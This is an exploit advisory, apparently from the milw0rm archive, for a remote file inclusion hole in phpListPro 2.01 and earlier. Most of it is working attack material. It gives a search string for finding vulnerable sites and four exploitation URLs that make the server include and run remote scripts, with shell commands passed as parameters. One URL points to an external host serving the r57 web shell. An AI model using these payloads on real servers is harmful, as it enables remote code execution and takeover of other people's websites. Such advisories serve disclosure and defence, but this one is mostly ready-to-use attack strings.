Title: phpListPro <= 2.01 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: SmartISoft URL: http://smartisoft.com ----------------------------------------------------------------- Credits: Discovered by: 'Aesthetico' http://www.majorsecurity.de ----------------------------------------------------------------- Search for: "PHPListPro ©2001-2006 SmartISoft" ----------------------------------------------------------------- Exploitation: /config.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF /editsite.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF /in.php?returnpath=http://www.yourspace.com/yourscript.txt?&ls%20-laF /addsite.php?returnpath=http://mitglied.lycos.de/n0ssy/r57.txt?&cmd=ls # milw0rm.com [2006-05-08]